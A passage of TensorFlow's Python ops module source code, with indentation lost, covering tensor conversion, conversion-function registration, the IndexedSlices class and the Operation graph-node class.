raise RuntimeError("Attempting to capture an EagerTensor without "
"building a function.")
return graph.capture(value, name=name)
if dtype is not None:
dtype = dtypes.as_dtype(dtype)
unwrapped_type = type(value)
conversion_func_list = _tensor_conversion_func_cache.get(unwrapped_type, None)
if conversion_func_list is None:
with _tensor_conversion_func_lock:
conversion_func_list = []
for _, funcs_at_priority in sorted(
_tensor_conversion_func_registry.items()):
for base_type, conversion_func in funcs_at_priority:
if isinstance(value, base_type):
conversion_func_list.append((base_type, conversion_func))
_tensor_conversion_func_cache[unwrapped_type] = conversion_func_list
for base_type, conversion_func in conversion_func_list:
# If dtype is None but preferred_dtype is not None, we try to
# cast to preferred_dtype first.
ret = None
if dtype is None and preferred_dtype is not None:
try:
ret = conversion_func(
value, dtype=preferred_dtype, name=name, as_ref=as_ref)
except (TypeError, ValueError, errors.UnimplementedError,
errors.InvalidArgumentError):
# Could not coerce the conversion to use the preferred dtype.
ret = None
if ret is not None and ret is not NotImplemented:
if (ret.dtype.base_dtype !=
dtypes.as_dtype(preferred_dtype).base_dtype):
raise TypeError("convert_to_tensor did not convert to "
"the preferred dtype: %s vs %s " %
(ret.dtype.base_dtype,
dtypes.as_dtype(preferred_dtype).base_dtype))
if ret is None:
ret = conversion_func(value, dtype=dtype, name=name, as_ref=as_ref)
if ret is NotImplemented:
continue
if not isinstance(ret, Tensor):
raise RuntimeError(
"%sConversion function %r for type %s returned non-Tensor: %r" %
(_error_prefix(name), conversion_func, base_type, ret))
if dtype and not dtype.is_compatible_with(ret.dtype):
raise RuntimeError(
"%sConversion function %r for type %s returned incompatible "
"dtype: requested = %s, actual = %s" %
(_error_prefix(name), conversion_func, base_type, dtype.name,
ret.dtype.name))
return ret
raise TypeError("%sCannot convert %r with type %s to Tensor: "
"no conversion function registered." %
(_error_prefix(name), value, unwrapped_type))
def internal_convert_n_to_tensor(values,
dtype=None,
name=None,
as_ref=False,
preferred_dtype=None,
ctx=None):
"""Converts `values` to a list of `Tensor` objects.
Args:
values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
name: (Optional.) A name prefix to use when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
as_ref: True if the caller wants the results as ref tensors.
preferred_dtype: Optional element type for the returned tensors,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
ctx: The value of context.context().
Returns:
A list of `Tensor` and/or `IndexedSlices` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
if not isinstance(values, collections.Sequence):
raise TypeError("values must be a list.")
ret = []
if ctx is None: ctx = context.context()
for i, value in enumerate(values):
n = None if name is None else "%s_%d" % (name, i)
ret.append(
internal_convert_to_tensor(
value,
dtype=dtype,
name=n,
as_ref=as_ref,
preferred_dtype=preferred_dtype,
ctx=ctx))
return ret
def convert_n_to_tensor(values, dtype=None, name=None, preferred_dtype=None):
"""Converts `values` to a list of `Tensor` objects.
Args:
values: A list of objects that can be consumed by `tf.convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` objects.
name: (Optional.) A name prefix to use when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
preferred_dtype: Optional element type for the returned tensors,
used when dtype is None. In some cases, a caller may not have a
dtype in mind when converting to a tensor, so preferred_dtype
can be used as a soft preference. If the conversion to
`preferred_dtype` is not possible, this argument has no effect.
Returns:
A list of `Tensor` and/or `IndexedSlices` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
return internal_convert_n_to_tensor(
values=values,
dtype=dtype,
name=name,
preferred_dtype=preferred_dtype,
as_ref=False)
@tf_export("convert_to_tensor_or_indexed_slices")
def convert_to_tensor_or_indexed_slices(value, dtype=None, name=None):
"""Converts the given object to a `Tensor` or an `IndexedSlices`.
If `value` is an `IndexedSlices` or `SparseTensor` it is returned
unmodified. Otherwise, it is converted to a `Tensor` using
`convert_to_tensor()`.
Args:
value: An `IndexedSlices`, `SparseTensor`, or an object that can be consumed
by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`IndexedSlices`.
name: (Optional.) A name to use if a new `Tensor` is created.
Returns:
A `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`.
Raises:
ValueError: If `dtype` does not match the element type of `value`.
"""
return internal_convert_to_tensor_or_indexed_slices(
value=value, dtype=dtype, name=name, as_ref=False)
def internal_convert_to_tensor_or_indexed_slices(value,
dtype=None,
name=None,
as_ref=False):
"""Converts the given object to an `Tensor` or an `IndexedSlices`.
If `value` is an `IndexedSlices` or `SparseTensor` it is returned
unmodified. Otherwise, it is converted to a `Tensor` using
`convert_to_tensor()`.
Args:
value: An `IndexedSlices`, `SparseTensor`, or an object that can be consumed
by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`IndexedSlices`.
name: (Optional.) A name to use if a new `Tensor` is created.
as_ref: True if the caller wants the results as ref tensors.
Returns:
A `Tensor`, `IndexedSlices`, or `SparseTensor` based on `value`.
Raises:
ValueError: If `dtype` does not match the element type of `value`.
"""
if isinstance(value, EagerTensor) and not context.executing_eagerly():
return internal_convert_to_tensor(
value, dtype=dtype, name=name, as_ref=as_ref)
elif isinstance(value, _TensorLike):
if dtype and not dtypes.as_dtype(dtype).is_compatible_with(value.dtype):
raise ValueError(
"Tensor conversion requested dtype %s for Tensor with dtype %s: %r" %
(dtypes.as_dtype(dtype).name, value.dtype.name, str(value)))
return value
else:
return internal_convert_to_tensor(
value, dtype=dtype, name=name, as_ref=as_ref)
def internal_convert_n_to_tensor_or_indexed_slices(values,
dtype=None,
name=None,
as_ref=False):
"""Converts `values` to a list of `Tensor` or `IndexedSlices` objects.
Any `IndexedSlices` or `SparseTensor` objects in `values` are returned
unmodified.
Args:
values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects that
can be consumed by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`IndexedSlices`.
name: (Optional.) A name prefix to use when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
as_ref: True if the caller wants the results as ref tensors.
Returns:
A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
if not isinstance(values, collections.Sequence):
raise TypeError("values must be a list.")
ret = []
for i, value in enumerate(values):
if value is None:
ret.append(value)
else:
n = None if name is None else "%s_%d" % (name, i)
ret.append(
internal_convert_to_tensor_or_indexed_slices(
value, dtype=dtype, name=n, as_ref=as_ref))
return ret
def convert_n_to_tensor_or_indexed_slices(values, dtype=None, name=None):
"""Converts `values` to a list of `Output` or `IndexedSlices` objects.
Any `IndexedSlices` or `SparseTensor` objects in `values` are returned
unmodified.
Args:
values: A list of `None`, `IndexedSlices`, `SparseTensor`, or objects that
can be consumed by `convert_to_tensor()`.
dtype: (Optional.) The required `DType` of the returned `Tensor` or
`IndexedSlices`.
name: (Optional.) A name prefix to use when a new `Tensor` is
created, in which case element `i` will be given the name `name
+ '_' + i`.
Returns:
A list of `Tensor`, `IndexedSlices`, and/or `SparseTensor` objects.
Raises:
TypeError: If no conversion function is registered for an element in
`values`.
RuntimeError: If a registered conversion function returns an invalid
value.
"""
return internal_convert_n_to_tensor_or_indexed_slices(
values=values, dtype=dtype, name=name, as_ref=False)
# TODO(josh11b): Add ctx argument to conversion_func() signature.
@tf_export("register_tensor_conversion_function")
def register_tensor_conversion_function(base_type,
conversion_func,
priority=100):
"""Registers a function for converting objects of `base_type` to `Tensor`.
The conversion function must have the following signature:
```python
def conversion_func(value, dtype=None, name=None, as_ref=False):
# ...
```
It must return a `Tensor` with the given `dtype` if specified. If the
conversion function creates a new `Tensor`, it should use the given
`name` if specified. All exceptions will be propagated to the caller.
The conversion function may return `NotImplemented` for some
inputs. In this case, the conversion process will continue to try
subsequent conversion functions.
If `as_ref` is true, the function must return a `Tensor` reference,
such as a `Variable`.
NOTE: The conversion functions will execute in order of priority,
followed by order of registration. To ensure that a conversion function
`F` runs before another conversion function `G`, ensure that `F` is
registered with a smaller priority than `G`.
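For illustration, a minimal sketch that registers a conversion function for
a hypothetical `Point2D` class (the class and function below are not part of
TensorFlow):
```python
class Point2D(object):
  def __init__(self, x, y):
    self.x, self.y = x, y

def _point_to_tensor(value, dtype=None, name=None, as_ref=False):
  del as_ref  # reference semantics are not supported for this type
  return tf.constant([value.x, value.y], dtype=dtype, name=name)

tf.register_tensor_conversion_function(Point2D, _point_to_tensor)
# tf.convert_to_tensor(Point2D(1.0, 2.0)) now yields a rank-1 float Tensor.
```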
Args:
base_type: The base type or tuple of base types for all objects that
`conversion_func` accepts.
conversion_func: A function that converts instances of `base_type` to
`Tensor`.
priority: Optional integer that indicates the priority for applying this
conversion function. Conversion functions with smaller priority values
run earlier than conversion functions with larger priority values.
Defaults to 100.
Raises:
TypeError: If the arguments do not have the appropriate type.
"""
global _tensor_conversion_func_cache
with _tensor_conversion_func_lock:
if not (isinstance(base_type, type) or
(isinstance(base_type, tuple) and
all(isinstance(x, type) for x in base_type))):
raise TypeError("base_type must be a type or a tuple of types.")
if not callable(conversion_func):
raise TypeError("conversion_func must be callable.")
# context._context is checked so that we don't inadvertently create it.
# This is because enable_eager_execution will fail when called from the main
# function if the context._context is already created, and the
# register_tensor_conversion_function calls happen when the module is
# imported.
if context._context is not None and context.executing_eagerly(
) and isinstance(base_type, six.integer_types + (
float,
np.ndarray,
)):
# TODO(nareshmodi): consider setting a context variable which disables the
# fastpath instead.
raise TypeError(
"Cannot register conversions for numpy arrays, python number types "
"when executing eagerly.")
try:
funcs_at_priority = _tensor_conversion_func_registry[priority]
except KeyError:
funcs_at_priority = []
_tensor_conversion_func_registry[priority] = funcs_at_priority
funcs_at_priority.append((base_type, conversion_func))
_tensor_conversion_func_cache = {}
@tf_export("IndexedSlices")
class IndexedSlices(_TensorLike):
"""A sparse representation of a set of tensor slices at given indices.
This class is a simple wrapper for a pair of `Tensor` objects:
* `values`: A `Tensor` of any dtype with shape `[D0, D1, ..., Dn]`.
* `indices`: A 1-D integer `Tensor` with shape `[D0]`.
An `IndexedSlices` is typically used to represent a subset of a larger
tensor `dense` of shape `[LARGE0, D1, .. , DN]` where `LARGE0 >> D0`.
The values in `indices` are the indices in the first dimension of
the slices that have been extracted from the larger tensor.
The dense tensor `dense` represented by an `IndexedSlices` `slices` has
```python
dense[slices.indices[i], :, :, :, ...] = slices.values[i, :, :, :, ...]
```
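For example, a small illustrative sketch (the shapes and values are made up):
```python
values = tf.constant([[1.0, 2.0], [3.0, 4.0]])   # shape [2, 2]
indices = tf.constant([0, 3])                    # rows of the dense tensor
slices = tf.IndexedSlices(values, indices, dense_shape=tf.constant([5, 2]))
# `slices` stands for a [5, 2] dense tensor whose rows 0 and 3 hold
# [1.0, 2.0] and [3.0, 4.0]; the remaining rows are treated as zero when
# the slices are densified (e.g. during gradient accumulation).
```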
The `IndexedSlices` class is used principally in the definition of
gradients for operations that have sparse gradients
(e.g. @{tf.gather}).
Contrast this representation with
@{tf.SparseTensor},
which uses multi-dimensional indices and scalar values.
"""
def __init__(self, values, indices, dense_shape=None):
"""Creates an `IndexedSlices`."""
_get_graph_from_inputs([values, indices, dense_shape])
self._values = values
self._indices = indices
self._dense_shape = dense_shape
@property
def values(self):
"""A `Tensor` containing the values of the slices."""
return self._values
@property
def indices(self):
"""A 1-D `Tensor` containing the indices of the slices."""
return self._indices
@property
def dense_shape(self):
"""A 1-D `Tensor` containing the shape of the corresponding dense tensor."""
return self._dense_shape
@property
def name(self):
"""The name of this `IndexedSlices`."""
return self.values.name
@property
def device(self):
"""The name of the device on which `values` will be produced, or `None`."""
return self.values.device
@property
def op(self):
"""The `Operation` that produces `values` as an output."""
return self.values.op
@property
def dtype(self):
"""The `DType` of elements in this tensor."""
return self.values.dtype
@property
def graph(self):
"""The `Graph` that contains the values, indices, and shape tensors."""
return self._values.graph
def __str__(self):
return "IndexedSlices(indices=%s, values=%s%s)" % (
self._indices, self._values, (", dense_shape=%s" % self._dense_shape)
if self._dense_shape is not None else "")
def __neg__(self):
return IndexedSlices(-self.values, self.indices, self.dense_shape)
IndexedSlicesValue = collections.namedtuple(
"IndexedSlicesValue", ["values", "indices", "dense_shape"])
def _device_string(dev_spec):
if isinstance(dev_spec, pydev.DeviceSpec):
return dev_spec.to_string()
else:
return dev_spec
def _NodeDef(op_type, name, device=None, attrs=None): # pylint: disable=redefined-outer-name
"""Create a NodeDef proto.
Args:
op_type: Value for the "op" attribute of the NodeDef proto.
name: Value for the "name" attribute of the NodeDef proto.
device: string, device, or function from NodeDef to string.
Value for the "device" attribute of the NodeDef proto.
attrs: Optional dictionary where the key is the attribute name (a string)
and the value is the respective "attr" attribute of the NodeDef proto (an
AttrValue).
Returns:
A node_def_pb2.NodeDef protocol buffer.
"""
node_def = node_def_pb2.NodeDef()
node_def.op = compat.as_bytes(op_type)
node_def.name = compat.as_bytes(name)
if attrs is not None:
for k, v in six.iteritems(attrs):
node_def.attr[k].CopyFrom(v)
if device is not None:
if callable(device):
node_def.device = device(node_def)
else:
node_def.device = _device_string(device)
return node_def
# Copied from core/framework/node_def_util.cc
# TODO(mrry,josh11b): Consolidate this validation in C++ code.
_VALID_OP_NAME_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\-/]*$")
_VALID_SCOPE_NAME_REGEX = re.compile("^[A-Za-z0-9_.\\-/]*$")
def _create_c_op(graph, node_def, inputs, control_inputs):
"""Creates a TF_Operation.
Args:
graph: a `Graph`.
node_def: `node_def_pb2.NodeDef` for the operation to create.
inputs: A list of `Tensor`s (corresponding to scalar inputs) and lists of
`Tensor`s (corresponding to sequence inputs, e.g. "int64 * N",
"list(int64)"). The length of the list should be equal to the number of
inputs specified by this operation's op def.
control_inputs: A list of `Operation`s to set as control dependencies.
Returns:
A wrapped TF_Operation*.
"""
# pylint: disable=protected-access
op_desc = c_api.TF_NewOperation(graph._c_graph,
compat.as_str(node_def.op),
compat.as_str(node_def.name))
# Add inputs
for op_input in inputs:
if isinstance(op_input, (list, tuple)):
c_api.TF_AddInputList(op_desc, [t._as_tf_output() for t in op_input])
else:
c_api.TF_AddInput(op_desc, op_input._as_tf_output())
# Add control inputs
for control_input in control_inputs:
c_api.TF_AddControlInput(op_desc, control_input._c_op)
# pylint: enable=protected-access
# Add attrs
for name, attr_value in node_def.attr.items():
serialized = attr_value.SerializeToString()
# TODO(skyewm): this creates and deletes a new TF_Status for every attr.
# It might be worth creating a convenient way to re-use the same status.
c_api.TF_SetAttrValueProto(op_desc, compat.as_str(name), serialized)
try:
c_op = c_api.TF_FinishOperation(op_desc)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
return c_op
@tf_export("Operation")
class Operation(object):
"""Represents a graph node that performs computation on tensors.
An `Operation` is a node in a TensorFlow `Graph` that takes zero or
more `Tensor` objects as input, and produces zero or more `Tensor`
objects as output. Objects of type `Operation` are created by
calling a Python op constructor (such as
@{tf.matmul})
or @{tf.Graph.create_op}.
For example `c = tf.matmul(a, b)` creates an `Operation` of type
"MatMul" that takes tensors `a` and `b` as input, and produces `c`
as output.
After the graph has been launched in a session, an `Operation` can
be executed by passing it to
@{tf.Session.run}.
`op.run()` is a shortcut for calling `tf.get_default_session().run(op)`.
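For example, a brief sketch of inspecting an `Operation` (assumes graph
construction, since eager tensors have no `op`):
```python
a = tf.constant([[1.0, 2.0]])
b = tf.constant([[3.0], [4.0]])
c = tf.matmul(a, b)
op = c.op
print(op.type)             # "MatMul"
print(len(op.inputs))      # 2
print(op.outputs[0] is c)  # True
```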
"""
def __init__(self,
node_def,
g,
inputs=None,
output_types=None,
control_inputs=None,
input_types=None,
original_op=None,
op_def=None):
r"""Creates an `Operation`.
NOTE: This constructor validates the name of the `Operation` (passed
as `node_def.name`). Valid `Operation` names match the following
regular expression:
[A-Za-z0-9.][A-Za-z0-9_.\\-/]*
Args:
node_def: `node_def_pb2.NodeDef`. `NodeDef` for the `Operation`.
Used for attributes of `node_def_pb2.NodeDef`, typically `name`,
`op`, and `device`. The `input` attribute is irrelevant here
as it will be computed when generating the model.
g: `Graph`. The parent graph.
inputs: list of `Tensor` objects. The inputs to this `Operation`.
output_types: list of `DType` objects. List of the types of the
`Tensors` computed by this operation. The length of this list indicates
the number of output endpoints of the `Operation`.
control_inputs: list of operations or tensors from which to have a
control dependency.
input_types: List of `DType` objects representing the
types of the tensors accepted by the `Operation`. By default
uses `[x.dtype.base_dtype for x in inputs]`. Operations that expect
reference-typed inputs must specify these explicitly.
original_op: Optional. Used to associate the new `Operation` with an
existing `Operation` (for example, a replica with the op that was
replicated).
op_def: Optional. The `op_def_pb2.OpDef` proto that describes the
op type that this `Operation` represents.
Raises:
TypeError: if control inputs are not Operations or Tensors,
or if `node_def` is not a `NodeDef`,
or if `g` is not a `Graph`,
or if `inputs` are not tensors,
or if `inputs` and `input_types` are incompatible.
ValueError: if the `node_def` name is not valid.
"""
# For internal use only: `node_def` can be set to a TF_Operation to create
# an Operation for that op. This is useful for creating Operations for ops
# indirectly created by C API methods, e.g. the ops created by
# TF_ImportGraphDef. When `node_def` is a TF_Operation, all optional fields
# should be None.
if isinstance(node_def, node_def_pb2.NodeDef):
if node_def.ByteSize() >= (1 << 31) or node_def.ByteSize() < 0:
raise ValueError(
"Cannot create a tensor proto whose content is larger than 2GB.")
if not _VALID_OP_NAME_REGEX.match(node_def.name):
raise ValueError("'%s' is not a valid node name" % node_def.name)
c_op = None
elif type(node_def).__name__ == "SwigPyObject":
assert inputs is None
assert output_types is None
assert control_inputs is None
assert input_types is None
assert original_op is None
assert op_def is None
c_op = node_def
else:
raise TypeError("node_def needs to be a NodeDef: %s" % node_def)
if not isinstance(g, Graph):
raise TypeError("g needs to be a Graph: %s" % g)
self._graph = g
if inputs is None:
inputs = []
elif not isinstance(inputs, list):
raise TypeError("inputs needs to be a list of Tensors: %s" % inputs)
for a in inputs:
if not isinstance(a, Tensor):
raise TypeError("input needs to be a Tensor: %s" % a)
if input_types is None:
input_types = [i.dtype.base_dtype for i in inputs]
else:
if not all(
x.is_compatible_with(i.dtype)
for i, x in zip(inputs, input_types)):
raise TypeError("In op '%s', input types (%s) are not compatible "
"with expected types (%s)" %
(node_def.name, [i.dtype for i in inputs],
input_types))
# Build the list of control inputs.
control_input_ops = []
if control_inputs:
for c in control_inputs:
control_op = None
if isinstance(c, Operation):
control_op = c
elif isinstance(c, (Tensor, IndexedSlices)):
control_op = c.op
else:
raise TypeError("Control input must be an Operation, "
"a Tensor, or IndexedSlices: %s" % c)
control_input_ops.append(control_op)
# This will be set by self.inputs.
self._inputs_val = None
self._id_value = self._graph._next_id() # pylint: disable=protected-access
self._original_op = original_op
self._traceback = self._graph._extract_stack() # pylint: disable=protected-access
self._control_flow_context = self.graph._get_control_flow_context() # pylint: disable=protected-access
# Initialize self._c_op.
if c_op:
self._c_op = c_op
else:
if op_def is None:
op_def = self._graph._get_op_def(node_def.op)
# TODO(skyewm): op_def_library.apply_op() flattens the incoming inputs.
# Refactor so we don't have to do this here.
grouped_inputs = self._reconstruct_sequence_inputs(
op_def, inputs, node_def.attr)
self._c_op = _create_c_op(self._graph, node_def, grouped_inputs,
control_input_ops)
# Initialize self._outputs.
num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
output_types = [
c_api.TF_OperationOutputType(c_api_util.tf_output(self._c_op, i))
for i in range(num_outputs)]
self._outputs = [
Tensor(self, i, output_type)
for i, output_type in enumerate(output_types)
]
self._graph._add_op(self) # pylint: disable=protected-access
if not c_op:
self._control_flow_post_processing()
def _control_flow_post_processing(self):
"""Add this op to its control flow context.
This may add new ops and change this op's inputs. self.inputs must be
available before calling this method.
"""
for input_tensor in self.inputs:
control_flow_util.CheckInputFromValidContext(self, input_tensor.op)
if self._control_flow_context is not None:
self._control_flow_context.AddOp(self)
def _reconstruct_sequence_inputs(self, op_def, inputs, attrs):
"""Regroups a flat list of input tensors into scalar and sequence inputs.
Args:
op_def: The `op_def_pb2.OpDef` (for knowing the input types)
inputs: a list of input `Tensor`s to the op.
attrs: mapping from attr name to `attr_value_pb2.AttrValue` (these define
how long each sequence is)
Returns:
A list of `Tensor`s (corresponding to scalar inputs) and lists of
`Tensor`s (corresponding to sequence inputs).
"""
grouped_inputs = []
i = 0
for input_arg in op_def.input_arg:
if input_arg.number_attr:
input_len = attrs[input_arg.number_attr].i
is_sequence = True
elif input_arg.type_list_attr:
input_len = len(attrs[input_arg.type_list_attr].list.type)
is_sequence = True
else:
input_len = 1
is_sequence = False
if is_sequence:
grouped_inputs.append(inputs[i:i + input_len])
else:
grouped_inputs.append(inputs[i])
i += input_len
assert i == len(inputs)
return grouped_inputs
def colocation_groups(self):
"""Returns the list of colocation groups of the op."""
default_colocation_group = [
compat.as_bytes("loc:@%s" % self.name)
]
try:
class_attr = self.get_attr("_class")
except ValueError:
# This op has no explicit colocation group, so it is itself its
# own root of a colocation group.
return default_colocation_group
attr_groups = [
class_name for class_name in class_attr
if class_name.startswith(b"loc:@")
]
# If there are no colocation groups in the explicit _class field,
# return the default colocation group.
return attr_groups if attr_groups else default_colocation_group
def values(self):
"""DEPRECATED: Use outputs."""
return tuple(self.outputs)
def _get_control_flow_context(self):
"""Returns the control flow context of this op.
Returns:
A context object.
"""
return self._control_flow_context
def _set_control_flow_context(self, ctx):
"""Sets the current control flow context of this op.
Args:
ctx: a context object.
"""
self._control_flow_context = ctx
@property
def name(self):
"""The full name of this operation."""
return c_api.TF_OperationName(self._c_op)
@property
def _id(self):
"""The unique integer id of this operation."""
return self._id_value
@property
def device(self):
"""The name of the device to which this op has been assigned, if any.
Returns:
The string name of the device to which this op has been
assigned, or an empty string if it has not been assigned to a
device.
"""
return c_api.TF_OperationDevice(self._c_op)
@property
def _output_types(self):
"""List this operation's output types.
Returns:
List of the types of the Tensors computed by this operation.
Each element in the list is an integer whose value is one of
the TF_DataType enums defined in c_api.h
The length of this list indicates the number of output endpoints
of the operation.
"""
num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
output_types = [
c_api.TF_OperationOutputType(self._tf_output(i))
for i in xrange(num_outputs)
]
# In all the tests we have, the output_types passed into Operation.__init__
# are lists of ints (which is illegal according to the docstring), but
# input_types are instances of DType.
# This extra assert is to catch if we ever use DType for output_types.
if output_types:
assert isinstance(output_types[0], int)
return output_types
def _tf_output(self, output_idx):
"""Create and return a new TF_Output for output_idx'th output of this op."""
tf_output = c_api.TF_Output()
tf_output.oper = self._c_op
tf_output.index = output_idx
return tf_output
def _tf_input(self, input_idx):
"""Create and return a new TF_Input for input_idx'th input of this op."""
tf_input = c_api.TF_Input()
tf_input.oper = self._c_op
tf_input.index = input_idx
return tf_input
def _set_device(self, device): # pylint: disable=redefined-outer-name
"""Set the device of this operation.
Args:
device: string or device. The device to set.
"""
c_api.SetRequestedDevice(
self._graph._c_graph, # pylint: disable=protected-access
self._c_op, # pylint: disable=protected-access
compat.as_str(_device_string(device)))
def _update_input(self, index, tensor):
"""Update the input to this operation at the given index.
NOTE: This is for TF internal use only. Please don't use it.
Args:
index: the index of the input to update.
tensor: the Tensor to be used as the input at the given index.
Raises:
TypeError: if tensor is not a Tensor,
or if input tensor type is not convertible to dtype.
ValueError: if the Tensor is from a different graph.
"""
if not isinstance(tensor, Tensor):
raise TypeError("tensor must be a Tensor: %s" % tensor)
_assert_same_graph(self, tensor)
# Make sure output shapes are already computed for this op in case we create
# a cycle (we cannot compute shapes for cycles). Usually shapes are computed
# lazily upon request.
if not _USE_C_SHAPES:
set_shape_and_handle_data_for_outputs(self)
# Reset cached inputs.
self._inputs_val = None
c_api.UpdateEdge(
self._graph._c_graph, # pylint: disable=protected-access
tensor._as_tf_output(), # pylint: disable=protected-access
self._tf_input(index))
def _add_control_inputs(self, ops):
"""Add a list of new control inputs to this operation.
Args:
ops: the list of Operations to add as control input.
Raises:
TypeError: if ops is not a list of Operations.
ValueError: if any op in ops is from a different graph.
"""
for op in ops:
if not isinstance(op, Operation):
raise TypeError("op must be an Operation: %s" % op)
c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access
def _add_control_input(self, op):
"""Add a new control input to this operation.
Args:
op: the Operation to add as control input.
Raises:
TypeError: if op is not an Operation.
ValueError: if op is from a different graph.
"""
if not isinstance(op, Operation):
raise TypeError("op must be an Operation: %s" % op)
c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access
def _remove_all_control_inputs(self):
"""Removes any control inputs to this operation."""
c_api.RemoveAllControlInputs(self._graph._c_graph, self._c_op) # pylint: disable=protected-access
def __str__(self):
return str(self.node_def)
def __repr__(self):
return "<tf.Operation '%s' type=%s>" % (self.name, self.type)
@property
def outputs(self):
"""The list of `Tensor` objects representing the outputs of this op."""
return self._outputs
# pylint: disable=protected-access
class _InputList(object):
"""Immutable input list wrapper."""
def __init__(self, inputs):
self._inputs = inputs
def __iter__(self):
return iter(self._inputs)
def __len__(self):
return len(self._inputs)
def __bool__(self):
return bool(self._inputs)
# Python 3 wants __bool__, Python 2.7 wants __nonzero__
__nonzero__ = __bool__
def __getitem__(self, i):
return self._inputs[i]
# pylint: enable=protected-access
@property
def inputs(self):
"""The list of `Tensor` objects representing the data inputs of this op."""
if self._inputs_val is None:
tf_outputs = c_api.GetOperationInputs(self._c_op)
# pylint: disable=protected-access
retval = [
self.graph._get_tensor_by_tf_output(tf_output)
for tf_output in tf_outputs
]
# pylint: enable=protected-access
self._inputs_val = Operation._InputList(retval)
return self._inputs_val
@property
def _inputs(self):
logging.warning("Operation._inputs is private, use Operation.inputs "
"instead. Operation._inputs will eventually be removed.")
return self.inputs
@_inputs.setter
def _inputs(self, value):
raise ValueError("Cannot assign _inputs")
@property
def _input_types(self):
num_inputs = c_api.TF_OperationNumInputs(self._c_op)
input_types = [
dtypes.as_dtype(c_api.TF_OperationInputType(self._tf_input(i)))
for i in xrange(num_inputs)
]
return input_types
@_input_types.setter
def _input_types(self, value):
raise ValueError("Cannot assign _input_types")
@property
def control_inputs(self):
"""The `Operation` objects on which this op has a control dependency.
Before this op is executed, TensorFlow will ensure that the
operations in `self.control_inputs` have finished executing. This
mechanism can be used to run ops sequentially for performance
reasons, or to ensure that the side effects of an op are observed
in the correct order.
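For example, a short sketch using the public `tf.control_dependencies` API
(assumes graph construction):
```python
a = tf.constant(1.0)
with tf.control_dependencies([a.op]):
  b = tf.constant(2.0)
assert a.op in b.op.control_inputs
```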
Returns:
A list of `Operation` objects.
"""
control_c_ops = c_api.TF_OperationGetControlInputs_wrapper(self._c_op)
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(
c_api.TF_OperationName(c_op)) for c_op in control_c_ops
]
# pylint: enable=protected-access
@property
def _control_outputs(self):
"""The `Operation` objects which have a control dependency on this op.
Before any of the ops in self._control_outputs can execute, TensorFlow will
ensure self has finished executing.
Returns:
A list of `Operation` objects.
"""
control_c_ops = c_api.TF_OperationGetControlOutputs_wrapper(self._c_op)
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(
c_api.TF_OperationName(c_op)) for c_op in control_c_ops
]
# pylint: enable=protected-access
@property
def _control_inputs(self):
logging.warning("Operation._control_inputs is private, use "
"Operation.control_inputs instead. "
"Operation._control_inputs will eventually be removed.")
return self.control_inputs
@_control_inputs.setter
def _control_inputs(self, value):
logging.warning("Operation._control_inputs is private, use "
"Operation.control_inputs instead. "
"Operation._control_inputs will eventually be removed.")
# Copy value because it may be self._control_inputs_val (in particular if
# this is called from self._control_inputs += ...), and we don't want to
# clear value below.
value = copy.copy(value)
self._remove_all_control_inputs()
self._add_control_inputs(value)
@property
def type(self):
"""The type of the op (e.g. `"MatMul"`)."""
return c_api.TF_OperationOpType(self._c_op)
@property
def graph(self):
"""The `Graph` that contains this operation."""
return self._graph
@property
def node_def(self):
# pylint: disable=line-too-long
"""Returns the `NodeDef` representation of this operation.
Returns:
A
[`NodeDef`](https://www.tensorflow.org/code/tensorflow/core/framework/node_def.proto)
protocol buffer.
"""
# pylint: enable=line-too-long
with c_api_util.tf_buffer() as buf:
c_api.TF_OperationToNodeDef(self._c_op, buf)
data = c_api.TF_GetBuffer(buf)
node_def = node_def_pb2.NodeDef()
node_def.ParseFromString(compat.as_bytes(data))
return node_def
@property
def _node_def(self):
logging.warning("Operation._node_def is private, use Operation.node_def "
"instead. Operation._node_def will eventually be removed.")
return self.node_def
@property
def op_def(self):
# pylint: disable=line-too-long
"""Returns the `OpDef` proto that represents the type of this op.
Returns:
An
[`OpDef`](https://www.tensorflow.org/code/tensorflow/core/framework/op_def.proto)
protocol buffer.
"""
# pylint: enable=line-too-long
return self._graph._get_op_def(self.type)
@property
def _op_def(self):
logging.warning("Operation._op_def is private, use Operation.op_def "
"instead. Operation._op_def will eventually be removed.")
return self.op_def
@property
def traceback(self):
"""Returns the call stack from when this operation was constructed."""
return self._graph._convert_stack(self._traceback) # pylint: disable=protected-access
@property
def traceback_with_start_lines(self):
"""Same as traceback but includes start line of function definition.
Returns:
A list of 5-tuples (filename, lineno, name, code, func_start_lineno).
"""
return self._graph._convert_stack( # pylint: disable=protected-access
self._traceback,
include_func_start_lineno=True)
def _set_attr(self, attr_name, attr_value):
"""Private method used to set an attribute in the node_def."""
buf = c_api.TF_NewBufferFromString(
compat.as_bytes(attr_value.SerializeToString()))
try:
# pylint: disable=protected-access
